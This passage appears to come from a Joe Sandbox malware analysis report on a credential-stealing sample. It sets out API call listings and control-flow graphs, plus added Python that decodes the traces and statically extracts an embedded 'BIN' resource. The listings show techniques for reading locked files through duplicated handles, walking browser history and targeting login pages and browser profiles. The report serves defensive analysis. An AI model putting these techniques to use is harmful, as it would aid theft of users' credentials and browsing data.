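  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
"""

# One report line: optional bullet, optional "Part of subcall" prefix, api.MODULE(args), ref: addr
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

# (api, argument index) -> {bit: name}; flag sets are OR-combined when decoded
FLAG_TABLES = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS", 0x8: "TH32CS_SNAPMODULE"},
    ("OpenProcess", 0): {0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
                         0x40: "PROCESS_DUP_HANDLE", 0x400: "PROCESS_QUERY_INFORMATION"},
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 2): {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"},
    ("CreateFileMappingW", 2): {0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE"},
    ("MapViewOfFile", 1): {0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ"},
}
# (api, argument index) -> {value: name}; exact-match enumerations
ENUM_TABLES = {
    ("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"},
    ("NtQuerySystemInformation", 0): {5: "SystemProcessInformation", 16: "SystemHandleInformation"},
}
PROCESS_DUP_HANDLE = 0x40


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                     # int for 8-hex-digit constants, None for '?', str otherwise
    ref: int                       # call-site address
    subcall: Optional[int] = None  # function the line was hoisted from ("Part of subcall")


def parse_arg(token: str):
    token = token.strip()
    if token == "?":
        return None
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else token


def parse_trace(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings, hashes and blank lines are not API lines
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_arg(call: ApiCall, idx: int) -> Optional[str]:
    """Symbolic name for argument idx, or None when no table covers it."""
    if idx >= len(call.args) or not isinstance(call.args[idx], int):
        return None
    value, key = call.args[idx], (call.name, idx)
    if key in ENUM_TABLES:
        return ENUM_TABLES[key].get(value, f"0x{value:X}")
    if key in FLAG_TABLES:
        names = [n for bit, n in sorted(FLAG_TABLES[key].items()) if value & bit]
        leftover = value & ~sum(FLAG_TABLES[key])  # bits the table does not name
        return "|".join(names + ([f"0x{leftover:X}"] if leftover else [])) or "0"
    return None


def describe(call: ApiCall) -> str:
    out = []
    for i, arg in enumerate(call.args):
        sym = decode_arg(call, i)
        out.append(sym if sym is not None else "?" if arg is None
                   else f"0x{arg:X}" if isinstance(arg, int) else repr(arg))
    return f"{call.name}({', '.join(out)})"


def behaviours(calls: list) -> list:
    """Heuristic reading of the API chains; the wording is this example's interpretation."""
    names = {c.name for c in calls}
    found = []
    if {"CreateToolhelp32Snapshot", "Process32NextW", "QueryFullProcessImageNameW"} <= names:
        found.append("enumerates running processes and resolves each full image path")
    dup_open = any(c.name == "OpenProcess" and isinstance(c.args[0], int)
                   and c.args[0] & PROCESS_DUP_HANDLE for c in calls if c.args)
    if dup_open and {"DuplicateHandle", "MapViewOfFile", "WriteFile"} <= names:
        found.append("copies a file through a handle duplicated out of another process "
                     "(reads files the owning process keeps locked)")
    if any(c.name == "FindFirstUrlCacheEntryW" and "visited:" in c.args for c in calls):
        found.append("walks the WinINet URL cache 'visited:' entries (browser history)")
    return found


if __name__ == "__main__":
    for call in parse_trace(SAMPLE_TRACE):
        print(f"{call.ref:08X}  {describe(call)}")
    print(*behaviours(parse_trace(SAMPLE_TRACE)), sep="\n")
```

Run as a script it prints one decoded line per call and then the verdicts; any other function's API list from this report can be pasted in place of the sample. The API lists are static cross-references from the disassembly ("ref:" is the call site), so a verdict says what the code can do, not what this run did, and the tables only name the constants that occur in these listings.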

                                                                                                                                   Control-flow Graph

                                                                                                                                   • Basic blocks (id: address range, calls; successors):
                                                                                                                                   • 628: 40e175-40e1a1, call 40695d, call 406b90; -> 633, 634
                                                                                                                                   • 633: 40e1a7-40e1e5, memset; -> 636
                                                                                                                                   • 634: 40e299-40e2a8, call 4069a3; no successors
                                                                                                                                   • 636: 40e1e8-40e1fa, call 406e8f; -> 640, 641
                                                                                                                                   • 640: 40e270-40e27d, call 406b53; -> 636, 647
                                                                                                                                   • 641: 40e1fc-40e219, call 40dd50 (x2); -> 640, 652
                                                                                                                                   • 647: 40e283-40e286; -> 648, 649
                                                                                                                                   • 648: 40e291-40e294, call 40aa04; -> 634
                                                                                                                                   • 649: 40e288-40e290, free; -> 648
                                                                                                                                   • 652: 40e21b-40e21d; -> 640, 653
                                                                                                                                   • 653: 40e21f-40e235, call 40742e; -> 640, 656
                                                                                                                                   • 656: 40e237-40e242, call 40aae3; -> 640, 659
                                                                                                                                   • 659: 40e244-40e26b, _snwprintf, call 40a8d0; -> 640
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                                  • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                  • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                  • String ID: r!A
                                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                                  • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                  • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                                  Control-flow Graph

                                                                                                                                   control_flow_graph (basic block: address range, API calls in the block, successors):
                                                                                                                                   • 770 40b58d-40b59e -> 771, 772
                                                                                                                                   • 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW -> 773, 774
                                                                                                                                   • 772 40b62e-40b632 (no successors)
                                                                                                                                   • 773 40b5c2-40b5ce LoadResource -> 774, 775
                                                                                                                                   • 774 40b5e7 -> 776
                                                                                                                                   • 775 40b5d0-40b5e5 SizeofResource LockResource -> 776
                                                                                                                                   • 776 40b5e9-40b5eb -> 772, 777
                                                                                                                                   • 777 40b5ed-40b5ef -> 772, 778
                                                                                                                                   • 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b -> 772
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                  • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                  • String ID: BIN
                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
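The function above is the embedded-payload loader pattern: GetModuleHandleW(NULL) for the current image, FindResourceW for a resource of type "BIN" with integer ID 0x32, then LoadResource, SizeofResource and LockResource, and finally memcpy of the resource bytes into a buffer obtained from call 40afcf before the result is handed to the following calls. Because the memory dump named in this block is based at the image base (0x400000), it is RVA-addressable, so the same lookup can be reproduced statically without running the sample. The Python below is an added example written for this report, not code from Joe Sandbox or from the sample: it walks the three-level PE resource directory (type, name, language) the way FindResourceW does and returns the leaf bytes. The resource tree, RVAs and payload it parses are constructed in build_sample_image and are assumptions for illustration; the content of the real "BIN" resource is not on this page and should be treated as opaque bytes to be decoded separately.

```python
import struct

# Layouts from the PE/COFF specification (little-endian). Directory and entry
# offsets are relative to the start of the resource section; data RVAs are
# image-relative.
RES_DIR = struct.Struct("<IIHHHH")   # IMAGE_RESOURCE_DIRECTORY
RES_ENTRY = struct.Struct("<II")     # IMAGE_RESOURCE_DIRECTORY_ENTRY
RES_DATA = struct.Struct("<IIII")    # IMAGE_RESOURCE_DATA_ENTRY
HIGH_BIT = 0x80000000                # set: name is a string / data is a subdirectory
LOW_BITS = 0x7FFFFFFF


def _dir_string(image, rsrc_rva, off):
    """IMAGE_RESOURCE_DIR_STRING_U: u16 character count followed by UTF-16LE."""
    (n,) = struct.unpack_from("<H", image, rsrc_rva + off)
    start = rsrc_rva + off + 2
    return image[start:start + 2 * n].decode("utf-16-le")


def _entries(image, rsrc_rva, dir_off):
    """Yield (key, offset_to_data) for every entry of one directory level.
    key is a str for named entries and an int for ID entries."""
    _, _, _, _, n_named, n_id = RES_DIR.unpack_from(image, rsrc_rva + dir_off)
    pos = rsrc_rva + dir_off + RES_DIR.size
    for i in range(n_named + n_id):
        name, data = RES_ENTRY.unpack_from(image, pos + i * RES_ENTRY.size)
        key = _dir_string(image, rsrc_rva, name & LOW_BITS) if name & HIGH_BIT else name
        yield key, data


def find_resource(image, rsrc_rva, rtype, rname):
    """Static equivalent of FindResourceW + LoadResource/LockResource/SizeofResource:
    match the type level, then the name level, and return the first language leaf.
    image is an RVA-addressable buffer (a dump mapped at its image base),
    rsrc_rva the RVA of the resource directory root."""
    for key, data in _entries(image, rsrc_rva, 0):
        if key != rtype or not data & HIGH_BIT:
            continue
        for key2, data2 in _entries(image, rsrc_rva, data & LOW_BITS):
            if key2 != rname or not data2 & HIGH_BIT:
                continue
            for _lang, data3 in _entries(image, rsrc_rva, data2 & LOW_BITS):
                if data3 & HIGH_BIT:
                    continue  # malformed extra level; a leaf is expected here
                rva, size, _codepage, _reserved = RES_DATA.unpack_from(image, rsrc_rva + data3)
                return bytes(image[rva:rva + size])
    return None


# Constructed sample data (assumption for illustration, not the sample's real .rsrc).
SAMPLE_PAYLOAD = b"constructed-blob-standing-in-for-the-real-resource"
SAMPLE_RSRC_RVA = 0x1000
SAMPLE_DATA_RVA = 0x2000


def build_sample_image():
    """Build a minimal RVA-addressable image with one type "BIN" holding one
    resource with ID 0x32 in one language. Directory layout (offsets into .rsrc):
    0x00 root dir, 0x10 its entry, 0x18 type dir, 0x28 its entry, 0x30 language
    dir, 0x40 its entry, 0x48 data entry, 0x58 the UTF-16 string "BIN"."""
    rsrc = bytearray(0x60)
    RES_DIR.pack_into(rsrc, 0x00, 0, 0, 0, 0, 1, 0)                     # root: 1 named entry
    RES_ENTRY.pack_into(rsrc, 0x10, HIGH_BIT | 0x58, HIGH_BIT | 0x18)   # "BIN" -> type dir
    RES_DIR.pack_into(rsrc, 0x18, 0, 0, 0, 0, 0, 1)                     # type dir: 1 ID entry
    RES_ENTRY.pack_into(rsrc, 0x28, 0x32, HIGH_BIT | 0x30)              # ID 0x32 -> language dir
    RES_DIR.pack_into(rsrc, 0x30, 0, 0, 0, 0, 0, 1)                     # language dir: 1 ID entry
    RES_ENTRY.pack_into(rsrc, 0x40, 0x0409, 0x48)                       # en-US -> data entry
    RES_DATA.pack_into(rsrc, 0x48, SAMPLE_DATA_RVA, len(SAMPLE_PAYLOAD), 0, 0)
    struct.pack_into("<H", rsrc, 0x58, 3)
    rsrc[0x5A:0x60] = "BIN".encode("utf-16-le")
    image = bytearray(0x3000)
    image[SAMPLE_RSRC_RVA:SAMPLE_RSRC_RVA + len(rsrc)] = rsrc
    image[SAMPLE_DATA_RVA:SAMPLE_DATA_RVA + len(SAMPLE_PAYLOAD)] = SAMPLE_PAYLOAD
    return bytes(image)


if __name__ == "__main__":
    img = build_sample_image()
    blob = find_resource(img, SAMPLE_RSRC_RVA, "BIN", 0x32)
    print(len(blob), blob[:16])
```

On a real dump the root RVA comes from the data directory entry IMAGE_DIRECTORY_ENTRY_RESOURCE in the optional header; on a raw file on disk the RVAs must first be translated through the section table, which this example deliberately does not do. The leaf bytes are returned unmodified: what the sample does with them happens in the calls that follow the memcpy, which this block does not resolve.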

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 4039892925-2068335096
• Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
• Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A

APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
